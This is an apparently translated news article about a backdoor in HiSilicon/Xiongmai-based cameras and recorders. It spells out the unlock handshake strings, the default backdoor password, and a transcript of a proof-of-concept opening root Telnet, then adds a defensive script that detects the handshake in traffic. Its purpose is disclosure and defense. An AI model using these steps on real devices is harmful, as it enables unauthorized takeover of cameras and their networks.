Backdoor that can take over administrator rights on Chinese network cameras is reported

by rawf8

With the spread of IoT, which connects all kinds of things to the Internet, a large number of inexpensive smart speakers and network cameras manufactured by Chinese companies have come to market. However, vulnerabilities and backdoors have been reported in Chinese-made devices in the past, and trust in their security has become an issue. This time, YourChief has reported that IoT devices such as network cameras running Chinese-made firmware contain a backdoor that can be used to gain administrator privileges.

Full disclosure: 0day vulnerability (backdoor) in firmware for HiSilicon-based DVRs, NVRs and IP cameras / Habr
https://habr.com/en/post/486856/

0day vulnerability in firmware for HiSilicon-based DVRs, NVRs and IP cameras | Hacker News
https://news.ycombinator.com/item?id=22251329

GitHub-Snawoot / hisilicon-dvr-telnet: PoC materials for article https://habr.com/en/post/486856/
https://github.com/Snawoot/hisilicon-dvr-telnet

The backdoor reported this time makes it possible to gain administrator privileges on a device such as a network-connected camera by sending it specific signals, after which the device can be remotely controlled via Telnet. Some devices equipped with firmware made by the Chinese company Xiongmai are affected.

Hangzhou Xiongmai Technology Co., LTD.
http://www.xiongmaitech.com/en/index.php

In 2016, Xiongmai devices were reported to have been infected with malware because their user names and passwords had been left at the defaults.

Large-scale DDoS attack, security camera on springboard, Chinese manufacturer recalls-ITmedia Enterprise
https://www.itmedia.co.jp/enterprise/articles/1610/25/news059.html

A specific method for verifying that the backdoor can be enabled has also been reported. Devices with the backdoor have certain TCP ports open from the start. Connect to such a port and send the string "OpenTelnet:OpenOnce".

The device that receives this string returns the string "randNum:XXXXXXXX", which contains a random eight-digit number. After "randNum:XXXXXXXX" has been returned, send the device the string "XXXXXXXX2wj9fsa2", which combines that number with the backdoor's default password "2wj9fsa2".

If the authentication succeeds, the device responds with "verify:OK". Next, send the "Telnet:OpenOnce" string to the device again, and the Telnet service starts on the device. After that, connecting over Telnet as usual with the user name "root" and its password gives control of the device with administrator privileges. The root user's password was recovered by analyzing a file extracted from the firmware with hashcat, and it has been published along with the verification method.

A program that actually exercises the backdoor has also been published.

GitHub-Snawoot / hisilicon-dvr-telnet: PoC materials for article https://habr.com/en/post/486856/
https://github.com/Snawoot/hisilicon-dvr-telnet

When the code is run against a device, it behaves as follows and gains administrator privileges.

$ telnet 198.51.100.23
Trying 198.51.100.23...
telnet: Unable to connect to remote host: Connection refused
$ ./hs-dvr-telnet 198.51.100.23 2wj9fsa2
Sent OpenTelnet:OpenOnce command.
randNum:46930886
challenge=469308862wj9fsa2
verify:OK
Open:OK
$ telnet 198.51.100.23
Trying 198.51.100.23...
Connected to 198.51.100.23.
Escape character is '^)'.
LocalHost login: root
Password:
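
For defenders, the handshake shown above leaves recognizable strings in network traffic. The following is an added example, not code from the article or the PoC repository: it walks reassembled TCP payloads and reports how far each client/device pair got through the handshake. The record layout, function names and all sample addresses other than 198.51.100.23 are constructed assumptions.

```python
import re

# Marker strings as they appear in the article's transcript. Whitespace after
# the colon is tolerated because the prose and the transcript differ on it.
REQUEST = re.compile(rb"OpenTelnet:\s*OpenOnce")      # sent by the client
DEVICE_STAGES = [                                      # sent by the device, in order
    ("challenge", re.compile(rb"randNum:\s*\d{8}")),
    ("verified", re.compile(rb"verify:\s*OK")),
    ("opened", re.compile(rb"Open:\s*OK")),
]

def detect_backdoor_handshake(records):
    """records: (src_ip, dst_ip, payload_bytes) tuples in capture order.
    Returns {(client, device): furthest handshake stage reached}."""
    progress = {}  # (client, device) -> number of device stages seen so far
    for src, dst, payload in records:
        if REQUEST.search(payload):
            progress.setdefault((src, dst), 0)  # keep the furthest stage on retries
            continue
        key = (dst, src)  # a device reply flows device -> client
        seen = progress.get(key)
        if seen is None or seen == len(DEVICE_STAGES):
            continue
        if DEVICE_STAGES[seen][1].search(payload):
            progress[key] = seen + 1
    return {k: (DEVICE_STAGES[n - 1][0] if n else "request")
            for k, n in progress.items()}

def devices_to_isolate(records):
    """Devices that accepted the backdoor password or confirmed Telnet start."""
    hits = detect_backdoor_handshake(records)
    return sorted({dev for (_, dev), stage in hits.items()
                   if stage in ("verified", "opened")})

# Constructed sample payloads (documentation address ranges only).
SAMPLE = [
    ("203.0.113.5", "198.51.100.23", b"OpenTelnet:OpenOnce"),
    ("198.51.100.23", "203.0.113.5", b"randNum:46930886"),
    ("203.0.113.5", "198.51.100.23", b"<client response, content not inspected>"),
    ("198.51.100.23", "203.0.113.5", b"verify:OK"),
    ("203.0.113.5", "198.51.100.23", b"Telnet:OpenOnce"),
    ("198.51.100.23", "203.0.113.5", b"Open:OK"),
    ("203.0.113.9", "198.51.100.40", b"OpenTelnet:OpenOnce"),  # probe, no reply
    ("203.0.113.7", "198.51.100.23", b"GET / HTTP/1.1\r\n"),   # unrelated traffic
]

if __name__ == "__main__":
    print(detect_backdoor_handshake(SAMPLE))
    print("isolate:", devices_to_isolate(SAMPLE))
```

A pair that only reaches "request" indicates a probe that the device did not answer, while "verified" or "opened" means the device accepted the backdoor password and should be treated as compromised.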

"If you are using a device with this backdoor, consider replacing it immediately. If replacement is difficult, isolate your device from the network."
